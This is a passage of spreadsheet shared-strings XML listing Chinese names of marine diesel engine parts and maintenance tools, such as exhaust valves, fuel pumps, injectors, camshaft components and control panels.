    <t xml:space="preserve">活塞挡圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞压力测试工具                                          </t>
  </si>
  <si>
    <r>
      <t>拉伸工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                        </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">活塞支座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞杆液压拉伸器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞油盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞头液压拉伸器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却                                              </t>
  </si>
  <si>
    <r>
      <t>伸缩套管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                             </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">白合金衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">填料函，伸缩管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">保护套管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">开口管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扫气箱壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">填料函壳体(半片)                                         </t>
  </si>
  <si>
    <t xml:space="preserve">法兰管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全扶手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀螺丝                                               </t>
  </si>
  <si>
    <t xml:space="preserve">截流孔管布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锥块（二片）                                            </t>
  </si>
  <si>
    <t xml:space="preserve">旋转机构                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴杆模板测量                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀导套-下端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧横挡                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱，螺丝和垫片                                          </t>
  </si>
  <si>
    <t xml:space="preserve">垫圈板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气控制单元                                          </t>
  </si>
  <si>
    <t xml:space="preserve">密封油控制单元                                           </t>
  </si>
  <si>
    <t xml:space="preserve">壳体.控制油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴导向螺丝                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气动排气阀空气供应                                         </t>
  </si>
  <si>
    <t xml:space="preserve">执行器+节流阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">执行气缸+活塞                                           </t>
  </si>
  <si>
    <t xml:space="preserve">执行器盖+单向阀流体缸                                       </t>
  </si>
  <si>
    <t xml:space="preserve">流动清洗单向阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力块安装工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀座+阀杆研磨机                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀挡环                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀工作台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀液压拉伸器组件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">高压管研磨工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">切割工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工作台台面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">工作台框架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀测量样规                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀测试设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀工具转换设备                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀测试设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀开启工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀打开工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀底部拆卸工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">液压活塞工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀衬套取出器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀桥规                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀修理                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀齿轮                                               </t>
  </si>
  <si>
    <r>
      <t>气缸液压单元基板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                            </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">燃油压力泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵筒                                                </t>
  </si>
  <si>
    <t xml:space="preserve">柱塞偶件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旋塞阀                                               </t>
  </si>
  <si>
    <t>续压器测试设备</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">蓄压器控制油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气控制块工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器喷嘴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器缝隙式滤器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器样件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带活塞的缸盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器测试                                             </t>
  </si>
  <si>
    <t xml:space="preserve">针阀偶件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴+滑块安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆+单向阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定物.喷油嘴总成                                         </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器喷嘴组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">球放气螺丝                                             </t>
  </si>
  <si>
    <t xml:space="preserve">触针                                                </t>
  </si>
  <si>
    <t xml:space="preserve">上紧工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力块安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器试验台                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力测试管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">试验台指南                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷油嘴清洗工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器测试器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油管座铣工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀杆导套取出器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器体研磨具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器研磨芯棒                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴研磨芯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴取出+清洗工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油燃气阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃气阀工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃气喷射阀工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃气阀测试装备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">金属套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管安全帽                                          </t>
  </si>
  <si>
    <t xml:space="preserve">安全帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀壳研磨器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀销板手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">复合安全阀测试设备                                         </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀和示功阀布置                                         </t>
  </si>
  <si>
    <t xml:space="preserve">高压油控制布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力底部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气阀滚轮导套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮销轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">换向销轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带滚子轴承的滚轮导筒                                        </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆总成                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆安全锁                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.阀动装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆导套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导轨支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹性环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀滚轮导套提升工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵滚轮导套提升工具                                       </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀取出器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">执行器测试设备                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵驱动组件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套润滑油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">阀件装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套阀件布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制油泵                                              </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全罩                                               </t>
  </si>
  <si>
    <t xml:space="preserve">换向轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴板接头说明                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴挡圈                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴定位工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承钢丝滑车                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承提升附件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">调节扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮抛光工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴定时量规                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴剖面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带配对标记的凸轮轴                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油和排气传动                                           </t>
  </si>
  <si>
    <t xml:space="preserve">座板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">门盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">停缸                                                </t>
  </si>
  <si>
    <t xml:space="preserve">停缸管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油滚轮导套轴承                                          </t>
  </si>
  <si>
    <t xml:space="preserve">提升装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">提升臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止回阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">轴承体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油泵导套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套颈部                                            </t>
  </si>
  <si>
    <t xml:space="preserve">端轴承                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰悬挂                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱前端面                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱后端面                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵排气阀驱动器支架                                       </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油密封布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">防护套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防护罩上盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">防护罩下盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒装置维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套提升六角板手                                        </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套机械起重机                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承液压拉伸器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">燃油和排气阀弹簧压缩工具                                      </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">驱动轴安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">传动轴轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">焊接齿轮箱下部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">焊接齿轮箱上部                                           </t>
  </si>
  <si>
    <t xml:space="preserve">低压液压油进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">低压液压油出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">高压液压油出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防溅罩                                               </t>
  </si>
  <si>
    <t xml:space="preserve">液压泵站                                              </t>
  </si>
  <si>
    <t xml:space="preserve">低压液压供应系统                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压安全和蓄压块                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链传动机构                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带漏斗的管子                                            </t>
  </si>
  <si>
    <t xml:space="preserve">伸缩管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴上的链轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带刹车盘的毂                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑动套筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">带螺母的滑动套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴上安装链轮                                          </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构附件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧轮装置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">定距支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">叉形推块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">张紧螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带铭牌的弹簧                                            </t>
  </si>
  <si>
    <t xml:space="preserve">侧板和轴                                              </t>
  </si>
  <si>
    <t xml:space="preserve">拧紧螺栓和轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">张紧器附件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带链轮的轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">调速器驱动                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器传动                                         </t>
  </si>
  <si>
    <t xml:space="preserve">导轨安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导轨梁                                               </t>
  </si>
  <si>
    <t xml:space="preserve">止推轴承减振                                            </t>
  </si>
  <si>
    <t xml:space="preserve">注油器驱动                                             </t>
  </si>
  <si>
    <t xml:space="preserve">注油器驱动齿轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">惰轮组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">驱动齿轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液压马达提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链条张紧定距块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">紧急换向机械拉伸器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">驱动链液压工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液力马达提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">链条安装指导                                            </t>
  </si>
  <si>
    <t xml:space="preserve">1阶力矩补偿器用销规                                        </t>
  </si>
  <si>
    <t xml:space="preserve">应急换向工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气动研磨机支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">反转曲柄铣削工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">铣削工具定位                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间轮组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">维修凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气维修凸轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油维修凸轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">远程压力表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承温度控制                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承监控                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主滑油控制                                             </t>
  </si>
  <si>
    <t xml:space="preserve">缸盖泄放检查                                            </t>
  </si>
  <si>
    <t xml:space="preserve">活塞冷却油控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力转化器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">远程指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力表管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力表框架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表板支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油仪表                                           </t>
  </si>
  <si>
    <t xml:space="preserve">特殊仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">遥控                                                </t>
  </si>
  <si>
    <t xml:space="preserve">装备                                                </t>
  </si>
  <si>
    <t xml:space="preserve">流量控制器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器订单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">恒温器箱安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">恒压阀支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">链接点                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力转换器悬挂                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度触头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">遥控仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">探头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">温度开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器液位指示器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">水平开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">缸套壁温传感器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力计和温度计说明                                         </t>
  </si>
  <si>
    <t xml:space="preserve">仪表电子零件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子仪表布线                                            </t>
  </si>
  <si>
    <t xml:space="preserve">PMI压力测量系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PMI缸压监控                                           </t>
  </si>
  <si>
    <t xml:space="preserve">传感器箱支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器箱支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器箱护罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">传感器支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">编码器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">编码器支架安装                                           </t>
  </si>
  <si>
    <t xml:space="preserve">水压力表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">增压器转速计                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器振动监控                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动箱安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PT100传感器安装                                        </t>
  </si>
  <si>
    <t xml:space="preserve">电缆安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">ni-cr/ni传感器安装                                     </t>
  </si>
  <si>
    <t xml:space="preserve">电缆导管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导线管管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">软管接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">速度控制箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高温水预热箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">温度压力电缆管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">恒压阀布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">稳压器布置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力传感器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">传感器安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">底/背监控仪安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">柱塞筒+顶盖组件                                          </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带蓄压器的燃油泵                                          </t>
  </si>
  <si>
    <t xml:space="preserve">端盖组件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封壳                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带停车阀的顶盖                                           </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰的执行器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">导向座组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带套筒的泵体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带柱塞的泵体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵柱塞-螺塞                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">带执行器的燃油泵                                          </t>
  </si>
  <si>
    <t xml:space="preserve">缓冲指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">柔性连接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀+吸油阀                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压柱塞提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">提升架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵体提升工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">提升工具底板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提前角测量工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">最大压力齿条工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀取出工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油管切削工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀拧紧工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">VIT齿条牵引工具                                         </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵体铰刀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">齿条定距器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安装密封环工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油泵起吊工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柱塞密封工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">吸油阀密封工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空气活塞密封工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顶盖密封工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹规                                               </t>
  </si>
  <si>
    <t xml:space="preserve">泵滚轮导筒                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操控台管系                                             </t>
  </si>
  <si>
    <t xml:space="preserve">操控台供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">压力表管组件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带气动部件的板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子连接机构装配                                          </t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀组件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">开关布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">标准部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">灯布置                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">降速报警面板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">转速设定单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">应急车钟                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主面板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">船桥面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">降速系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">错向联锁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机舱面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气动单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">转换阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">蜂鸣器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">联锁电磁阀                                             </t>
  </si>
  <si>
    <t xml:space="preserve">声音警报                                              </t>
  </si>
  <si>
    <t xml:space="preserve">可视警报                                              </t>
  </si>
  <si>
    <t xml:space="preserve">正倒车指示器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">信号板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力计和温度计                                           </t>
  </si>
  <si>
    <t xml:space="preserve">转换开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滤器单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">供电单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制选择器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排泄阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">变压器整流器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">操纵台防尘帽                                            </t>
  </si>
  <si>
    <t xml:space="preserve">临界转速单元                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">计时器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">闪光继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">继电器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">延迟继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">编码插头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">印刷电路板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">印刷插头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子设备电流                                            </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝插座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保险丝盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电阻-电流转换器插座                                        </t>
  </si>
  <si>
    <t xml:space="preserve">电阻-电流转换器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">灯测试单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">指针指示器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接线端                                               </t>
  </si>
  <si>
    <t xml:space="preserve">端制动器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">元件标牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全控制系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">超速保护系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">部分                                                </t>
  </si>
  <si>
